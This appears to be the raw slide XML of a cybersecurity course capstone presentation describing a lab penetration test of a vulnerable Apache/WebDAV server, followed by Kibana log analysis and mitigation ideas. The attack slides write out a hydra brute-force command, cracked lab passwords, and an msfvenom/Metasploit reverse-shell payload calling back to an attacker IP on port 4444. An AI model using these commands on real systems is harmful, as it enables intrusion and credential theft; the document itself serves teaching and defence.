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Black"/>
      <p:bold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Inconsolata"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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438638-B2DE-4B4D-B6B1-14E4E53770A1}">
  <a:tblStyle styleId="{43438638-B2DE-4B4D-B6B1-14E4E53770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Inconsolata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regular.fntdata"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-bold.fntdata"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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Black-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold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2a421a89c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2a421a89c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903e48541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903e48541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The image on the right hand side is an example of hydra failing to access the contents of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="E01E5A"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>secret_folder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  directory.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2ada8b42e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2ada8b42e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10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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2920900" y="3908725"/>
            <a:ext cx="370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Presenter:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>  Keith Gaston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Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119" name="Google Shape;111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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241625" y="148057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-Hyrda was used to do a forced attack.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-Downloaded rockyou.txt file and unzipped file.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-Then ran Type: hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get  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6" name="Google Shape;112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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2875775" y="1480575"/>
            <a:ext cx="158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-Credential access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-Cracked the password: leopoldo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0" name="Google Shape;1130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1" name="Google Shape;113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6660225" y="1007563"/>
            <a:ext cx="1910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Exploitation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5" name="Google Shape;11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325" y="1481325"/>
            <a:ext cx="3876100" cy="34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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141" name="Google Shape;1141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-Set up reverse shell:  msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; shell.php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-msfconsole to launch msfconsole.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-use exploit/multi/handler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-set payload php/meterpreter/reverse_tcp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-show options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-set LHOST 192.168.1.90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-exploit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5" name="Google Shape;1145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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="356272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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="24285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-Uploading a web shell allows us to execute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arbitrary shell commands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on the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2" name="Google Shape;1152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3" name="Google Shape;1153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4" name="Google Shape;1154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5" name="Google Shape;1155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Aftermath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7" name="Google Shape;11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075" y="1710550"/>
            <a:ext cx="2889700" cy="23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 PHP File Inclusion  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163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-Use Meterpreter to connect to uploaded web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-Use shell to explore and compromise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Connect to the webdav folder by navigating to 192.168.1.105/webdav. Use the credentials that Ryan:  user: ryan pass: linux4u.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6" name="Google Shape;1166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7" name="Google Shape;1167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8" name="Google Shape;1168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9" name="Google Shape;1169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70" name="Google Shape;1170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1" name="Google Shape;1171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2" name="Google Shape;1172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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3870975" y="788725"/>
            <a:ext cx="4901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-Leveraging the RCE allows us to open a Meterpreter shell to the target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-Once on the target, the full file system is available for exploration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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="258823">
            <a:off x="3417459" y="2177749"/>
            <a:ext cx="558382" cy="528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5" name="Google Shape;1175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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009000" y="2414875"/>
            <a:ext cx="47433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Aftermath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-Achieving a shell on the target allows us to display files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7" name="Google Shape;11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000" y="3161075"/>
            <a:ext cx="4517725" cy="14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66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4" name="Google Shape;1184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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191900" y="722225"/>
            <a:ext cx="4501500" cy="419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91" name="Google Shape;1191;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973800" y="629500"/>
            <a:ext cx="3927900" cy="4062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What time did the port scan occur?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12:30 pm on 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How groups of many packets were sent and from which IP? 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Resting the courser at the top of the arc, we can observe over  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1,000 unique flows. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In the second chart we can observe it’s the IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.90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92" name="Google Shape;11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50" y="722225"/>
            <a:ext cx="4452851" cy="20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50" y="2823225"/>
            <a:ext cx="4452851" cy="20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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879750" y="1138200"/>
            <a:ext cx="7496400" cy="3444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observe that the victim responded back with 401 (Unauthorized), 207 (Multi-Status), 200 (OK), and 404 (Not found) responses. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;119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 (cont.)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0" name="Google Shape;1200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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342625" y="696475"/>
            <a:ext cx="85389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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>responses did the victim respond back with?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02" name="Google Shape;12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475" y="1231050"/>
            <a:ext cx="5822675" cy="2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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455100" y="675425"/>
            <a:ext cx="8559300" cy="2405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9" name="Google Shape;1209;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292100" y="3222250"/>
            <a:ext cx="40311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What time did the request occur? How many requests were made?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3 screenshots we can observe that the attack started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5/14/22 at 12:30 pm with 63.79% errors -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16,753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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451725" y="3222250"/>
            <a:ext cx="43998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 What did they contain?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top three hits for directories and files that were requested were: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http://192.168.1.105/company_folder/secret_folder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http://192.168.1.105/company_folder/webdav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http://192.168.1.105/webdav/shell.php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1" name="Google Shape;12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00" y="722650"/>
            <a:ext cx="4072626" cy="24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725" y="722650"/>
            <a:ext cx="4600175" cy="24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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292350" y="1288375"/>
            <a:ext cx="8559300" cy="3628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9" name="Google Shape;1219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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292349" y="680900"/>
            <a:ext cx="8559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b="1" lang="en" sz="1400">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> directory was requested </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>16,753 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>times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The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> file was requested </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>17 times</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1221" name="Google Shape;12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75" y="1338275"/>
            <a:ext cx="8613875" cy="349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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="732450"/>
            <a:ext cx="9144000" cy="2656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8" name="Google Shape;1228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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3388950"/>
            <a:ext cx="90831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logs contain evidence of a large number of requests for the sensitive data.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>This is a telltale signature of a brute-force attack.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Specifically, the password protected “secret_folder” was requested 16,753 times, but the directory with the folder was only accessed 10 times.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30" name="Google Shape;12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5" y="775675"/>
            <a:ext cx="4287425" cy="26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625" y="775675"/>
            <a:ext cx="4670175" cy="26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72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8" name="Google Shape;1238;p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9" name="Google Shape;103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44" name="Google Shape;1244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3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-Set low level alerts for port scanning and a severe alert for high numbers of scanning.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-Threshold should be about 15 for low and 50 for high.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Google Shape;1246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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>The local firewall can be used to throttle incoming connections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-ICMP traffic can be filtered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-An IP allowed list can be enabled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-Regular security checks on port.  Close ports that does not need to be open.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52" name="Google Shape;1252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-Create a list for blocking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>suspicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> IP addresses that are attempting to access directory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-Set a low alert for more than 3 password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> and high alert for more than 6.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-Set an alert to detect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> attempts within 30 seconds.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4" name="Google Shape;1254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-Confidential folders should not be shared on public access panel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-Increase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> strength requirements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-Schedule mandatory password reset every 60 days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60" name="Google Shape;1260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-More than 10 requests per second for 30 seconds should trigger the alarm and lock accounts for 30 minutes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-Setting an alert to alert any 401 errors to filter out wrong password attempts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2" name="Google Shape;1262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-Installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAPTCHAs are effective in stopping any kind of automated attack like brute-force attacks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-With the threshold set at 10 for all 401 unauthorized coldes. This will automatic stop the traffic from that IP address for 30 minutes.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68" name="Google Shape;1268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-Monitor access to WebDAV with Filebeat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-Fire an alarm on any read performed on files within WebDAV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-Set an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> alarm whenever someone accesses the WebDAV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>directory.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-Ideally, allow valid IP addresses.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-Generate an alert for blocked IPs connecting to WebDAV and from non secure locations.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0" name="Google Shape;1270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-Limit user access to WebDAV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-Scan all incoming traffic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-Have a more secure application in place to use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-Allow only internal access to WebDAV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76" name="Google Shape;1276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-Generate an alert for any traffic attempting to access port 4444. The threshold for the alert to be sent is when 3 attempts are made.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-A generated alert should be set for any files that are uploaded to the WebDAV. Threshold should be set for 2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8" name="Google Shape;1278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-Blocking the ability to upload files to this directory from the web would block future uploads.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3" name="Google Shape;1053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 Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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1" name="Google Shape;1061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2" name="Google Shape;10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" y="872925"/>
            <a:ext cx="6775975" cy="39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9" name="Google Shape;1069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0" name="Google Shape;1070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6" name="Google Shape;107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{43438638-B2DE-4B4D-B6B1-14E4E53770A1}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 (Hyper-V Azure machine)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 (preferred)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NATSwithch (Hos Machine Cloud based - Hosting the 3 VMs below).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used for penetration testing.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machine running Kibana -  Logs data from Capstone machine (192.168.1.105).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(server1)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replicating a vulnerable server - attempting to pop - hosting an Apache and ssh server.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{43438638-B2DE-4B4D-B6B1-14E4E53770A1}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Brute-force Attack</a:t>
                      </a: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 that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consists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systematically checking all possible usernames and possible combinations until the correct one is found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and along with a list of passwords (rockyou.txt), the password can be easily found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Web Port 80 with public access </a:t>
                      </a:r>
                      <a:endParaRPr b="1"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80 - HTTP servers and their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components are exposed to attacks. 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secret_folder is publicly accessible, but contains sensitive data intended only for authorized personnel.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exposure compromises credentials that attackers can use to break into the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are allowed to upload arbitrary files to the web server.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upload PHP scripts to the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File Inclusion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use PHP scripts to execute arbitrary shell commands.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 allows attackers to open a reverse shell to the server.s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0" name="Google Shape;109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91" name="Google Shape;1091;p61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{43438638-B2DE-4B4D-B6B1-14E4E53770A1}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="33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9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Cryptographic</a:t>
                      </a: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Failures</a:t>
                      </a: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Cryptographic Failures is an OWASP Top 10 vulnerability.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is being exposed: files with company sensitive information.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Exposure of the secret_folder directory and the connect_to_corp_server file compromised the credentials of the Web DAV folder.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29210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b="1"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 WebDAV on a server and shell access is possible.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WebDAV is not configured properly, it can allow hackers to remotely modify website content.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Open Web Port 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1097" name="Google Shape;1097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nmap to scan for open ports on the target machine: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-Run  “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192.168.1.0/24”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0" name="Google Shape;1100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01" name="Google Shape;110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3" name="Google Shape;1103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04" name="Google Shape;110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5" name="Google Shape;110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-The exploit revealed 256 IP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addresses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and 4 hosts up.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-Port 22 and 80 open.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-A secret_folder directory was discovered and accessed.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-This directory is password protected, but susceptible to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brute-force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8" name="Google Shape;1108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9" name="Google Shape;110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Exploitation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3" name="Google Shape;11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75" y="1605803"/>
            <a:ext cx="3009925" cy="2248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